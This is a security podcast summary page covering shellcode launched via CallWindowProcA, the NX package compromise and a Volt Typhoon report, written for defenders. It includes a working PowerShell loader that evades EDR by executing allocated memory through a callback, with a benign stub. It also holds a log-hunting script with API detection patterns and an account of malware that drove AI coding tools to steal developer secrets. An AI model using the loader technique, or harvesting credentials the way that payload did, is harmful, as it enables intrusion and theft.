SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)

SANS Stormcast Thursday, August 28th, 2025: Launching Shellcode; NX Compromise; Volt Typhoon Report

Aug 28, 2025
This episode covers a malware technique that uses PowerShell to launch shellcode while sidestepping the API sequence many EDRs watch for; the NX build-package compromise, whose payload used locally installed AI tools to hunt for developer credentials; and a global report on the 'Volt Typhoon' campaign that documents the reach of this state-sponsored espionage.
INSIGHT

Shellcode Via CallWindowProcA

  • Attackers can execute shellcode by handing the buffer's address to CallWindowProcA as the "window procedure" pointer; user32 then calls it, so no CreateThread (or similar thread-creation API) is needed. The buffer still has to be executable, since under DEP a non-executable page faults; what changes is the execution step, not the allocation step.
  • This breaks the VirtualAlloc, copy, CreateThread sequence that many EDR rules key on, so the usual allocate-copy-execute signature does not fire.
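The technique described above, as an added example that is not the diary's or the malware sample's code: a tiny, harmless x64 stub is placed in freshly allocated memory and executed by passing its address to CallWindowProcA. The stub bytes, the Demo.Win32 type name and the 64-bit Windows PowerShell host are this example's own assumptions.

```powershell
# Added example (not from the ISC diary or the podcast): execute a benign stub via
# CallWindowProcA instead of CreateThread. Assumes 64-bit Windows PowerShell.

if ([IntPtr]::Size -ne 8) { throw 'This example assumes a 64-bit PowerShell process.' }

if (-not ('Demo.Win32' -as [type])) {
    Add-Type -Namespace Demo -Name Win32 -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

[DllImport("user32.dll")]
public static extern IntPtr CallWindowProcA(IntPtr lpPrevWndFunc, IntPtr hWnd, uint Msg, IntPtr wParam, IntPtr lParam);
'@
}

# Constructed stand-in for shellcode. CallWindowProcA invokes lpPrevWndFunc as a
# WNDPROC, i.e. with (hWnd, Msg, wParam, lParam) in rcx, rdx, r8, r9 on x64.
# The stub returns wParam + lParam so the call is observable without doing harm.
#   4C 89 C0    mov rax, r8
#   4C 01 C8    add rax, r9
#   C3          ret
[byte[]]$stub = 0x4C, 0x89, 0xC0, 0x4C, 0x01, 0xC8, 0xC3

$MEM_COMMIT_RESERVE = 0x3000   # MEM_COMMIT | MEM_RESERVE
$PAGE_READWRITE     = 0x04
$PAGE_EXECUTE_READ  = 0x20
$size = [UIntPtr]::new([uint32]$stub.Length)

# 1. Allocate writable memory and copy the bytes in.
$mem = [Demo.Win32]::VirtualAlloc([IntPtr]::Zero, $size, $MEM_COMMIT_RESERVE, $PAGE_READWRITE)
if ($mem -eq [IntPtr]::Zero) {
    throw "VirtualAlloc failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
}
[Runtime.InteropServices.Marshal]::Copy($stub, 0, $mem, $stub.Length)

# 2. The page still has to be executable: under DEP a non-executable page faults.
#    What the technique skips is the CreateThread step, not this one.
$old = 0
if (-not [Demo.Win32]::VirtualProtect($mem, $size, $PAGE_EXECUTE_READ, [ref]$old)) {
    throw "VirtualProtect failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
}

# 3. Execute by handing the pointer to CallWindowProcA as the "window procedure".
#    hWnd is NULL and Msg is WM_NULL (0), so user32 performs no message translation
#    and simply calls our buffer. wParam and lParam are the stub's two operands.
$result = [Demo.Win32]::CallWindowProcA($mem, [IntPtr]::Zero, 0, [IntPtr]40, [IntPtr]2)
"CallWindowProcA returned $($result.ToInt64()) (wParam + lParam)"
```

Run it in an elevated or normal 64-bit PowerShell; no thread is created and no new process appears, which is exactly why hooks on CreateThread/CreateRemoteThread stay silent. Expect Defender or AMSI to be unhappy with the Add-Type plus VirtualAlloc plus callback combination, which is the point of the detection advice that follows.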
ADVICE

Monitor Uncommon API Execution

  • Monitor for uncommon API usage, such as CallWindowProcA being invoked from script hosts like PowerShell, together with execution of code from freshly allocated, non-image memory.
  • Use behaviour-based EDR rules that flag execute-from-data patterns in general, rather than only the VirtualAlloc/CreateThread allocation and syscall signatures of the classic loader.
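One place the pattern above is visible without an EDR is PowerShell script block logging. The following is an added example, not tooling from the podcast or the ISC diary: a small hunting function that flags script text combining memory allocation with callback-based execution, run over two constructed samples and then over local Event ID 4104 entries. The regexes, the function names and the sample script blocks are this example's own.

```powershell
# Added example (not from the ISC diary or the podcast): hunt PowerShell script-block
# logs for the allocate-then-execute-via-callback pattern discussed above.
# Assumes Windows with script block logging enabled (Event ID 4104 in the
# Microsoft-Windows-PowerShell/Operational log).

function Test-CallbackShellcodePattern {
    param([Parameter(Mandatory)][string]$ScriptText)

    # -match is case-insensitive in PowerShell, so mixed-case evasion is covered.
    $alloc    = $ScriptText -match '\bVirtualAlloc(Ex)?\b|\bVirtualProtect\b|\bNtAllocateVirtualMemory\b'
    $copy     = $ScriptText -match 'Marshal\]::Copy|\bRtlMoveMemory\b|\bWriteProcessMemory\b'
    $callback = $ScriptText -match '\bCallWindowProc[AW]?\b'
    $thread   = $ScriptText -match '\bCreateThread\b|\bCreateRemoteThread\b'

    [pscustomobject]@{
        Allocates        = $alloc
        CopiesPayload    = $copy
        UsesCallbackExec = $callback
        UsesCreateThread = $thread
        # Allocation plus a callback-execution API is the evasion variant; the
        # classic loader would show UsesCreateThread instead.
        Suspicious       = ($alloc -and $callback)
    }
}

function Find-CallbackShellcodeInLogs {
    param([int]$MaxEvents = 500)

    # A script block larger than 32 KB is logged as several 4104 events, so the
    # allocation and the callback may land in different entries; join chunks by
    # ScriptBlockId before scoring if you see partial hits.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # 4104 properties: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path
            $text = [string]$_.Properties[2].Value
            if (-not $text) { return }
            $r = Test-CallbackShellcodePattern -ScriptText $text
            if ($r.Suspicious) {
                [pscustomobject]@{
                    TimeCreated   = $_.TimeCreated
                    ScriptBlockId = $_.Properties[3].Value
                    Preview       = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

# Constructed samples (not real log entries). The first is an ordinary P/Invoke,
# the second mirrors the loader shape discussed above without any payload bytes.
$benignSample = @'
Add-Type -Namespace Demo -Name U32 -MemberDefinition '[DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow();'
[Demo.U32]::GetForegroundWindow()
'@

$suspectSample = @'
$m = [W32]::VirtualAlloc([IntPtr]::Zero, $sc.Length, 0x3000, 0x40)
[Runtime.InteropServices.Marshal]::Copy($sc, 0, $m, $sc.Length)
[W32]::CallWindowProcA($m, [IntPtr]::Zero, 0, [IntPtr]::Zero, [IntPtr]::Zero)
'@

Test-CallbackShellcodePattern -ScriptText $benignSample
Test-CallbackShellcodePattern -ScriptText $suspectSample

# Then hunt the local log (returns nothing if logging is off or no hits exist).
Find-CallbackShellcodeInLogs
```

The scorer flags the second sample and not the first. Treat it as a triage aid rather than a rule: string matching is trivially evaded by splitting or encoding API names, so the durable signal is the behavioural one from the advice above, namely execution from non-image memory reached through a callback API, which only telemetry at the API or kernel layer can see.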
ANECDOTE

NX Supply-Chain Compromise

  • The open-source NX build tool was compromised: malicious package versions shipped a telemetry.js that invoked locally installed AI coding-assistant command-line tools to search developer machines for secrets.
  • The stolen secrets, especially cryptocurrency wallet keys and deploy keys, were pushed to new public GitHub repositories created under the victims' own accounts.